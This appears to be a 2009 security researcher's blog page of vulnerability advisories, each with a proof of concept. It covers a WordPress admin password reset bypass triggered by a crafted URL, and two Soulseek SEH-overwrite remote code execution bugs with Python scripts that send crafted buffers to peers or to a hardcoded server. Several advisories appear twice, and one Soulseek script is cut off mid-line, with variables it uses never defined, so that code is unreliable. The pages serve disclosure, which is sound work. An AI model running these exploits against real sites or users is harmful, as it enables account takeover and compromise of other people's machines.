=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
WordPress <= 2.8.* Remote admin reset password
II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability.
WordPress is both free and priceless at the same time.
More simply, WordPress is what you use when you want to work with your blogging software, not fight it.
III. DESCRIPTION
-------------------------
The way Wordpress handle a password reset looks like this:
You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:
"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore this email and nothing will happen
http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"
You click on the link, and then Wordpress reset your admin password, and sends you over another email with your new credentials.
Let's see how it works:
wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
global $wpdb;
$key = preg_replace('/[^a-z0-9]/i', '', $key);
if ( empty( $key ) )
return new WP_Error('invalid_key', __('Invalid key'));
$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();
if ( isset($_GET['key']) )
$action = 'resetpass';
// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
$action = 'login';
...[snip]....
line 370:
break;
case 'resetpass' :
case 'rp' :
$errors = reset_password($_GET['key']);
if ( ! is_wp_error($errors) ) {
wp_redirect('wp-login.php?checkemail=newpass');
exit();
}
wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
exit();
break;
...[snip ]...
You can abuse the password reset function, and bypass the first step and then reset the admin password by submiting an array to the $key variable.
IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.
V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to reset the admin account of any wordpress/wordpress-mu <= 2.8.3
VI. SYSTEMS AFFECTED
-------------------------
All
VII. SOLUTION
-------------------------
No patch aviable for the moment.
Just make sure the admin e-mail adress exist, the attacker cant know what's the reseted password.
VIII. REFERENCES
-------------------------
http://www.wordpress.org
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great research on PHP, as for this under-estimated vulnerability discovered by Maksymilian Arciemowicz :
http://securityreason.com/achievement_securityalert/38
X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release
XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
Monday, August 10, 2009
Thursday, July 2, 2009
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
=============================================
- Release date: July 02, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=============================================
I. VULNERABILITY
-------------------------
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make
new friends and expand your mind!"
III. DESCRIPTION
-------------------------
Soulseek client allows direct peer file search, allowing a user to find the files he wants directly on the
peer computer.
Unfortunatly this feature is vulnerable to a remote SEH overwrite.
IV. PROOF OF CONCEPT
-------------------------
This proof of concept will target a user called 123yow123.
import struct
import sys, socket
from time import *
ip = "IP_ADDR"
port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip,port))
except:
print "Can\'t connect to peer!\n"
sys.exit(0)
junk = "\x41" * 3084
next_seh = struct.pack("< L", 0x42424242)
seh = struct.pack("< L", 0x43434343)
other_junk = "\x61" * 1424
buffer = "\x17\x00\x00\x00\x01\x09\x00\x00\x00\x31\x32\x33\x79\x6f\x77\x31"
buffer+= "\x32\x33\x01\x00\x00\x00\x50\x00\x00\x00\x00\x21\x0c\x00\x00\x08"
buffer+= "\x00\x00\x00\x6c\x7b\x1d\x0c\x15\x0c\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer)
After the query is send, the SEH handler will get overwriten.
V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any prior to 157 NS 13e Soulseek client
VI. SYSTEMS AFFECTED
-------------------------
Windows all versions
VII. SOLUTION
-------------------------
Upgrade to 157 NS 13e
(http://slsknet.org/download.html)
VIII. REFERENCES
-------------------------
http://www.slsknet.org
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
-------------------------
july 02, 2009
XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
XII. PERSONAL NOTES
------------------------
Souleek team as patched this bug month ago, a distributed message urging users to upgrade them Soulseek client
is still send since a month, and not much users still use vulnerable Soulseek versions.
@to the one who like to rip bugs and make an exploit ""universal"" for fame, just make sure it's at least
universal before you say so.
For the others : http://www.youtube.com/watch?v=tVACUjHn6yU :)
@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html
=============================================
- Release date: July 02, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=============================================
I. VULNERABILITY
-------------------------
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make
new friends and expand your mind!"
III. DESCRIPTION
-------------------------
Soulseek client allows direct peer file search, allowing a user to find the files he wants directly on the
peer computer.
Unfortunatly this feature is vulnerable to a remote SEH overwrite.
IV. PROOF OF CONCEPT
-------------------------
This proof of concept will target a user called 123yow123.
import struct
import sys, socket
from time import *
ip = "IP_ADDR"
port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip,port))
except:
print "Can\'t connect to peer!\n"
sys.exit(0)
junk = "\x41" * 3084
next_seh = struct.pack("< L", 0x42424242)
seh = struct.pack("< L", 0x43434343)
other_junk = "\x61" * 1424
buffer = "\x17\x00\x00\x00\x01\x09\x00\x00\x00\x31\x32\x33\x79\x6f\x77\x31"
buffer+= "\x32\x33\x01\x00\x00\x00\x50\x00\x00\x00\x00\x21\x0c\x00\x00\x08"
buffer+= "\x00\x00\x00\x6c\x7b\x1d\x0c\x15\x0c\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer)
After the query is send, the SEH handler will get overwriten.
V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any prior to 157 NS 13e Soulseek client
VI. SYSTEMS AFFECTED
-------------------------
Windows all versions
VII. SOLUTION
-------------------------
Upgrade to 157 NS 13e
(http://slsknet.org/download.html)
VIII. REFERENCES
-------------------------
http://www.slsknet.org
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
-------------------------
july 02, 2009
XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
XII. PERSONAL NOTES
------------------------
Souleek team as patched this bug month ago, a distributed message urging users to upgrade them Soulseek client
is still send since a month, and not much users still use vulnerable Soulseek versions.
@to the one who like to rip bugs and make an exploit ""universal"" for fame, just make sure it's at least
universal before you say so.
For the others : http://www.youtube.com/watch?v=tVACUjHn6yU :)
@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html
Thursday, June 4, 2009
Soulseek Patched !
Soulseek maintainer Nir Arbel did release a new Soulseek version (157 Ns 13e) who plug the security hole in previous clients.
He also did limit the search query length on the server, to avoid any kind of mass random attacks.
Contacting the Soulseek team was hard, but i need to mention that it wasn't because they was under-considering this security bug, they was just not reachable, because of some circonstances that can happens.
I want to thanks Nir Arbel for his very professional way to handle this security bug, after a contact can be done.
The Soulseek server as been patched in a matter of hours after he acknowledged the security advisory, and he did release a patched Soulseek client yesterday, after the bug was triggered locally.
Another advisory regarding another way to exploit this security hole will be responsibly disclosed when every clients on the Slsk network will be upgraded.
He also did limit the search query length on the server, to avoid any kind of mass random attacks.
Contacting the Soulseek team was hard, but i need to mention that it wasn't because they was under-considering this security bug, they was just not reachable, because of some circonstances that can happens.
I want to thanks Nir Arbel for his very professional way to handle this security bug, after a contact can be done.
The Soulseek server as been patched in a matter of hours after he acknowledged the security advisory, and he did release a patched Soulseek client yesterday, after the bug was triggered locally.
Another advisory regarding another way to exploit this security hole will be responsibly disclosed when every clients on the Slsk network will be upgraded.
Monday, May 25, 2009
Soulseek * P2P Remote Distributed Search Code Execution
=============================================
- Release date: May 24th, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=============================================
I. VULNERABILITY
-------------------------
Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make
new friends and expand your mind!"
III. DESCRIPTION
-------------------------
Soulseek client allows distributed file search to one person, everyone, or in a
specific Soulseek IRC channel, allowing a user to find the files he wants, in
a dedicated channel, or with his contacts, or on the whole network.
Unfortunatly this feature is vulnerable to a remote SEH overwrite to a specific
user, or even to a whole Soulseek IRC channel.
IV. PROOF OF CONCEPT
-------------------------
This proof of concept is made to prevent a S-K party, it is only build to
target the user "testt4321".
To try this proof of concept, you would have to open a soulseek client and use
the username:
"testt4321"
with the password:
"12345678"
And launch this code.
If you want to change the username or target a whole channel, you would have
to reverse the binary protocol
#!/usr/bin/python
import struct
import sys, socket
from time import *
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch
buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
s.send(buffer)
sleep(1)
junk = "\x41" * 3084
next_seh = struct.pack('
buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer2)
sleep(1)
s.recv(1024)
After the query is send, the memory will look like this
0012FBE4 41414141
0012FBE8 42424242 Pointer to next SEH record
0012FBEC 43434343 SE handler
0012FBF0 61616161
And the program will terminate with this structure:
EAX 00000000
ECX 43434343
EDX 7C9132BC ntdll.7C9132BC
EBX 00000000
ESP 0012EA78
EBP 0012EA98
ESI 00000000
EDI 00000000
EIP 43434343
V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek client connected to
the Soulseek network.
VI. SYSTEMS AFFECTED
-------------------------
Windows all versions
VII. SOLUTION
-------------------------
A fast solution would be to use Nicotine-Plus (http://nicotine-plus.sourceforge.net/)
a Python Soulseek client.
Another quick workaround (at server level) would be to limit the search query lenght.
VIII. REFERENCES
-------------------------
http://www.slsknet.org
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
-------------------------
May 24, 2009: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
july 29, 2008: Bug discovered
September 03, 2008: Vendor contacted; no response.
October 14, 2008: Vendor contacted; still no response.
April 12, 2009: Idefense contacted.
April 13, 2009: Idefense answered.
April 23, 2009: Advisory send to idefense contributor program.
May 13, 2009: Idefense contacted, bug rejected (no reason given)
May 15, 2009: Idefense recontacted; no answer.
May 16, 2009: Last try to contact Soulseek maintainers
May 24, 2009: Advisory published.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
- Release date: May 24th, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=============================================
I. VULNERABILITY
-------------------------
Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make
new friends and expand your mind!"
III. DESCRIPTION
-------------------------
Soulseek client allows distributed file search to one person, everyone, or in a
specific Soulseek IRC channel, allowing a user to find the files he wants, in
a dedicated channel, or with his contacts, or on the whole network.
Unfortunatly this feature is vulnerable to a remote SEH overwrite to a specific
user, or even to a whole Soulseek IRC channel.
IV. PROOF OF CONCEPT
-------------------------
This proof of concept is made to prevent a S-K party, it is only build to
target the user "testt4321".
To try this proof of concept, you would have to open a soulseek client and use
the username:
"testt4321"
with the password:
"12345678"
And launch this code.
If you want to change the username or target a whole channel, you would have
to reverse the binary protocol
#!/usr/bin/python
import struct
import sys, socket
from time import *
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch
buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
s.send(buffer)
sleep(1)
junk = "\x41" * 3084
next_seh = struct.pack('
buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer2)
sleep(1)
s.recv(1024)
After the query is send, the memory will look like this
0012FBE4 41414141
0012FBE8 42424242 Pointer to next SEH record
0012FBEC 43434343 SE handler
0012FBF0 61616161
And the program will terminate with this structure:
EAX 00000000
ECX 43434343
EDX 7C9132BC ntdll.7C9132BC
EBX 00000000
ESP 0012EA78
EBP 0012EA98
ESI 00000000
EDI 00000000
EIP 43434343
V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek client connected to
the Soulseek network.
VI. SYSTEMS AFFECTED
-------------------------
Windows all versions
VII. SOLUTION
-------------------------
A fast solution would be to use Nicotine-Plus (http://nicotine-plus.sourceforge.net/)
a Python Soulseek client.
Another quick workaround (at server level) would be to limit the search query lenght.
VIII. REFERENCES
-------------------------
http://www.slsknet.org
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
-------------------------
May 24, 2009: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
july 29, 2008: Bug discovered
September 03, 2008: Vendor contacted; no response.
October 14, 2008: Vendor contacted; still no response.
April 12, 2009: Idefense contacted.
April 13, 2009: Idefense answered.
April 23, 2009: Advisory send to idefense contributor program.
May 13, 2009: Idefense contacted, bug rejected (no reason given)
May 15, 2009: Idefense recontacted; no answer.
May 16, 2009: Last try to contact Soulseek maintainers
May 24, 2009: Advisory published.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
Subscribe to:
Posts (Atom)
Posts
